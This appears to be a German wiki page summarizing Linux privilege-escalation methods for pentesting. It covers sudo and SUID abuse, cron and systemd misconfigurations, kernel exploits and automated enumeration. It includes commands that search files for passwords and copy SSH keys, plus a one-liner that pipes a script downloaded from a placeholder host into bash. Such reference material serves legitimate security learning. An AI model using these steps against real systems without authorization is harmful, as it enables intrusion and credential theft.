Privilege escalation

Übersicht: Privilege Escalation unter Linux – Techniken und Anwendungsfälle

Ziel: Diese Seite bietet eine strukturierte Übersicht aller gängigen Privilege Escalation Methoden unter Linux, gegliedert nach Technik, typischem Befund und passendem Werkzeug. Sie dient als Navigationshilfe und Entscheidungshilfe, wann welche Methode sinnvoll ist.


🔑 1. Sudo-Rechte ausnutzen

Typischer Hinweis:

sudo -l

Wenn du Einträge wie (ALL) NOPASSWD: /usr/bin/<tool> siehst.

Methode:

  • Führe sudo-fähige Tools als Root aus

  • Nutze GTFOBins zur Prüfung, ob das Tool missbrauchbar ist

Beispiele: find, vi, less, perl, awk, tar


🧱 2. SUID-Binaries

Typischer Hinweis:

find / -perm -4000 -type f 2>/dev/null

Methode:

  • Suche nach root-eigenen Binaries mit SUID-Bit

  • Missbrauch durch:

    • PATH-Hijacking

    • Environment-Variable Manipulation

    • LD_PRELOAD (wenn möglich)

Tools: strings, strace, ltrace, Ghidra, GTFOBins


⏱ 3. Cron-Jobs

Typischer Hinweis:

cat /etc/crontab
crontab -l

Methode:

  • Wenn Root-Crons modifizierbare Skripte ausführen

  • Missbrauch von Wildcards und unsicheren Dateipfaden

Tools: find / -writable -type f, pspy


🧩 4. Systemdienste (systemd)

Typischer Hinweis:

systemctl list-units

Methode:

  • Schreibrechte auf .service-Dateien oder deren Binaries

  • Dienste als Root gestartet → Binary-Austausch = Root-Shell

Tools: ls -l, grep, systemctl, journalctl


🧠 5. Kernel Exploits

Typischer Hinweis:

uname -a
cat /etc/os-release

Methode:

  • Überprüfe Kernel-Version auf bekannte Exploits (z. B. DirtyCow)

Tools: exploit-db, searchsploit, Linux Exploit Suggester, linPEAS


📦 6. Schreibbare Konfigurationen und Dateizugriff

Typischer Hinweis:

find /etc -writable -type f

Methode:

  • Konfigurationsdateien modifizieren, die bei Dienststart gelesen werden

  • z. B. .bashrc, .profile, .ssh/authorized_keys


📜 7. Interessante Dateien & Benutzerfehler

Typischer Hinweis:

grep -i 'pass' /etc/* 2>/dev/null
ls -la /home/*/.ssh

Methode:

  • Hartkodierte Passwörter in Konfigurationsdateien

  • SSH-Keys kopieren


🔍 8. Automatisierte Enumeration

Tools:

  • linPEAS, Linux Exploit Suggester, LES, pspy

Warum:

  • Umfassende Prüfung auf alle PE-Vektoren

  • Farbliche Hervorhebung kritischer Stellen

Beispiel:

curl http://<IP>:8080/linpeas.sh | bash

🚩 Tipp: Vorgehen bei Enumeration

  1. sudo -l prüfen → GTFOBins

  2. find / -perm -4000 → SUID

  3. pspy ausführen → Crons/Trigger erkennen

  4. systemctl & /etc prüfen → Konfigs & Dienste

  5. Kernel-Version & Exploit-Datenbank vergleichen

  6. linPEAS → zur Absicherung gegen Lücken

Last updated